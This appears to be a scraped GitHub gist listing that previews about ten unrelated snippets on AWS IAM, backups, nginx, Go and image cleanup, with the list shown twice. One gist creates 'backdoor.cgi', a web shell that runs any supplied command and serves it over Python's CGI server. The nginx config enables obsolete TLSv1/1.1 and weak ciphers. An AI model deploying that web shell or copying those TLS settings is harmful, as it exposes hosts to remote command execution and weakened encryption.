J Axmacher jcaxmacher

## passrole_actions_and_parameters.csv

          
            IAM Permission
            Params

            
              amplify:CreateApp
              iamServiceRoleArn

            
              amplify:UpdateApp
              iamServiceRoleArn

            
              appconfig:CreateConfigurationProfile
              RetrievalRoleArn

            
              appconfig:UpdateConfigurationProfile
              RetrievalRoleArn

            
              appflow:CreateConnectorProfile
              connectorProfileConfig.connectorProfileProperties.Redshift.roleArn

            
              appflow:UpdateConnectorProfile
              connectorProfileConfig.connectorProfileProperties.Redshift.roleArn

            
              application-autoscaling:RegisterScalableTarget
              RoleARN

            
              apprunner:CreateService
              SourceConfiguration.AuthenticationConfiguration.AccessRoleArn|InstanceConfiguration.InstanceRoleArn

            
              apprunner:UpdateService
              SourceConfiguration.AuthenticationConfiguration.AccessRoleArn|InstanceConfiguration.InstanceRoleArn

## gist:38dcff6a0975f148aa858e924d64c492
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi


## pwned-passwords-sqlite-build.py
#!/usr/bin/env python3
# Build a SQLite3 DB for looking up SHA-1 hashes of leaked passwords.
#
# This can be fed the txt file from one of Have I Been Pwned's hash
# lists available from https://haveibeenpwned.com/Passwords -- but any
# text file with line format ``hash-hex:count`` will work.
#
# When run on the v5 hash-ordered SHA-1 file, expect the build to take
# about 35 minutes and produce a 15.7 GiB file (~30.5 bytes per record).
#

## gist:7d26ff5e885dc0ed34951ce20e5e79e0
UDEV rules and script Based on https://gist.github.com/jalaziz/bcfe2f71e3f7e8fe42a9c294c1e9279f.
Requires `nvme-cli` package found at https://github.com/linux-nvme/nvme-cli.
Based on rexray commit d5cf3ed1aac75a4595760fc0830beea5886588f0

```sh
[root@ip-172-31-2-242 ~]# /usr/bin/dvdcli --volumedriver=rexray --volumename=mesos-master01fu2.aws.sig path
INFO[0000] /var/lib/rexray/volumes/mesos-master01fu2.aws.sig/data
/var/lib/rexray/volumes/mesos-master01fu2.aws.sig/data
[root@ip-172-31-2-242 ~]# mount | grep mesos-master01fu2.aws.sig
/dev/nvme0n1 on /var/lib/rexray/volumes/mesos-master01fu2.aws.sig type ext4 (rw,relatime,data=ordered)

## aws-lambda-static-type-checker.md

      
              6 files
            
          
              8 forks
            
          
              8 comments
            
          
              80 stars
            
          
                alexcasalboni
                / aws-lambda-static-type-checker.md
            
            
              Last active
              May 22, 2023 07:31
            
              
                AWS Lambda Static Type Checker Example (Python3)
              
          
    How to use Python3 Type Hints in AWS Lambda

TL;DR

Static Type Checkers help you find simple (but subtle) bugs in your Python code. Check out lambda_types.py and incrementally improve your code base and development/debugging experience with type hints.

Your Lambda Function code will go from this:


## LambdaEfsBackup.py
import boto3
import time
region = 'eu-west-1'
user_data_script  = """#!/bin/bash
instanceid=$(curl http://169.254.169.254/latest/meta-data/instance-id)
cd /
mkdir moodledata
mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2 fs-xxxxxxxxxxc.efs.eu-west-1.amazonaws.com:/ moodledata
tar czf mooodledata-backup-$(date +%d-%m-%Y_%H-%M).tar.gz /moodledata
aws s3 mv mooodledata-backup-*.tar.gz s3://xxxxxxxxx/

## nginx-ssl-config.conf
       ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
       ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;

       ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
       ssl_prefer_server_ciphers on;
       ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:ECDHE-RSA-AES128-GCM-SHA256:AES256+EECDH:DHE-RSA-AES128-GCM-SHA256:AES256+EDH:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES256-GCM-SHA384:AES128-GCM-SHA256:AES256-SHA256:AES128-SHA256:AES256-SHA:AES128-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!DES:!MD5:!PSK:!RC4";
       ssl_session_cache shared:SSL:10m;
       ssl_dhparam /etc/ssl/certs/dhparam.pem;
       ssl_session_timeout 1d;
       ssl_session_tickets off;

## use.go
r := mux.NewRouter()

// Single handler
r.HandleFunc("/form", use(http.HandlerFunc(formHandler), csrf, logging)

// All handlers
http.Handle("/", recovery(r))

// Sub-routers
apiMiddleware := []func(http.Handler) http.Handler{logging, apiAuth, json}

## whiteboardCleaner.md

      
              1 file
            
          
              228 forks
            
          
              56 comments
            
          
              2095 stars
            
          
                lelandbatey
                / whiteboardCleaner.md
            
            
              Last active
              April 25, 2024 02:01
            
              
                Whiteboard Picture Cleaner - Shell one-liner/script to clean up and beautify photos of whiteboards!
              
          
    Description

This simple script will take a picture of a whiteboard and use parts of the ImageMagick library with sane defaults to clean it up tremendously.
The script is here:
#!/bin/bash
convert "$1" -morphology Convolve DoG:15,100,0 -negate -normalize -blur 0x1 -channel RBG -level 60%,91%,0.1 "$2"

Results


## sqlite_backup.py
#! /usr/bin/env python
# Of course, the author does not guarantee safety.
# I did my best by using SQLite's online backup API.
from __future__ import print_function
import sys, ctypes
from ctypes.util import find_library

SQLITE_OK = 0
SQLITE_ERROR = 1
SQLITE_BUSY = 5
	IAM Permission	Params
	amplify:CreateApp	iamServiceRoleArn
	amplify:UpdateApp	iamServiceRoleArn
	appconfig:CreateConfigurationProfile	RetrievalRoleArn
	appconfig:UpdateConfigurationProfile	RetrievalRoleArn
	appflow:CreateConnectorProfile	connectorProfileConfig.connectorProfileProperties.Redshift.roleArn
	appflow:UpdateConnectorProfile	connectorProfileConfig.connectorProfileProperties.Redshift.roleArn
	application-autoscaling:RegisterScalableTarget	RoleARN
	apprunner:CreateService	SourceConfiguration.AuthenticationConfiguration.AccessRoleArn\|InstanceConfiguration.InstanceRoleArn
	apprunner:UpdateService	SourceConfiguration.AuthenticationConfiguration.AccessRoleArn\|InstanceConfiguration.InstanceRoleArn
	cd /tmp
	mkdir cgi-bin
	echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
	echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
	echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
	chmod +x ./cgi-bin/backdoor.cgi
	python -m http.server --cgi
	#!/usr/bin/env python3
	# Build a SQLite3 DB for looking up SHA-1 hashes of leaked passwords.
	#
	# This can be fed the txt file from one of Have I Been Pwned's hash
	# lists available from https://haveibeenpwned.com/Passwords -- but any
	# text file with line format ``hash-hex:count`` will work.
	#
	# When run on the v5 hash-ordered SHA-1 file, expect the build to take
	# about 35 minutes and produce a 15.7 GiB file (~30.5 bytes per record).
	#
	UDEV rules and script Based on https://gist.github.com/jalaziz/bcfe2f71e3f7e8fe42a9c294c1e9279f.
	Requires `nvme-cli` package found at https://github.com/linux-nvme/nvme-cli.
	Based on rexray commit d5cf3ed1aac75a4595760fc0830beea5886588f0

	```sh
	[root@ip-172-31-2-242 ~]# /usr/bin/dvdcli --volumedriver=rexray --volumename=mesos-master01fu2.aws.sig path
	INFO[0000] /var/lib/rexray/volumes/mesos-master01fu2.aws.sig/data
	/var/lib/rexray/volumes/mesos-master01fu2.aws.sig/data
	[root@ip-172-31-2-242 ~]# mount \| grep mesos-master01fu2.aws.sig
	/dev/nvme0n1 on /var/lib/rexray/volumes/mesos-master01fu2.aws.sig type ext4 (rw,relatime,data=ordered)
	import boto3
	import time
	region = 'eu-west-1'
	user_data_script = """#!/bin/bash
	instanceid=$(curl http://169.254.169.254/latest/meta-data/instance-id)
	cd /
	mkdir moodledata
	mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2 fs-xxxxxxxxxxc.efs.eu-west-1.amazonaws.com:/ moodledata
	tar czf mooodledata-backup-$(date +%d-%m-%Y_%H-%M).tar.gz /moodledata
	aws s3 mv mooodledata-backup-*.tar.gz s3://xxxxxxxxx/
	ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
	ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;

	ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
	ssl_prefer_server_ciphers on;
	ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:ECDHE-RSA-AES128-GCM-SHA256:AES256+EECDH:DHE-RSA-AES128-GCM-SHA256:AES256+EDH:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES256-GCM-SHA384:AES128-GCM-SHA256:AES256-SHA256:AES128-SHA256:AES256-SHA:AES128-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!DES:!MD5:!PSK:!RC4";
	ssl_session_cache shared:SSL:10m;
	ssl_dhparam /etc/ssl/certs/dhparam.pem;
	ssl_session_timeout 1d;
	ssl_session_tickets off;
	r := mux.NewRouter()

	// Single handler
	r.HandleFunc("/form", use(http.HandlerFunc(formHandler), csrf, logging)

	// All handlers
	http.Handle("/", recovery(r))

	// Sub-routers
	apiMiddleware := []func(http.Handler) http.Handler{logging, apiAuth, json}
	#! /usr/bin/env python
	# Of course, the author does not guarantee safety.
	# I did my best by using SQLite's online backup API.
	from __future__ import print_function
	import sys, ctypes
	from ctypes.util import find_library

	SQLITE_OK = 0
	SQLITE_ERROR = 1
	SQLITE_BUSY = 5